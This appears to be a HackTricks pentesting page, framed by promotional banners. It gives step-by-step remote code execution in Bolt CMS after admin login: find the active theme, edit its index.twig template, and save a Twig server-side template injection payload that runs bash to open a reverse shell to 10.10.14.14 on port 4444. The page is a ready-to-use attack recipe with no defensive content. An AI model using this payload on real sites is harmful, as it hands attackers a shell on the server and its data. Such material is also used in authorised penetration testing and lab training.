Bolt CMS

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

RCE

After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:

Select Configuration -> View Configuration -> Main Configuration or go the the URL path /bolt/file-edit/config?file=/bolt/config.yaml
- Check the value of theme

Select File management -> View & edit templates
- Select the theme base found in the previous (base-2021 in this case) step and select index.twig
- In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
Set your payload in this file via template injection (Twig), like: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
- And save changes

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Last updated 2 months ago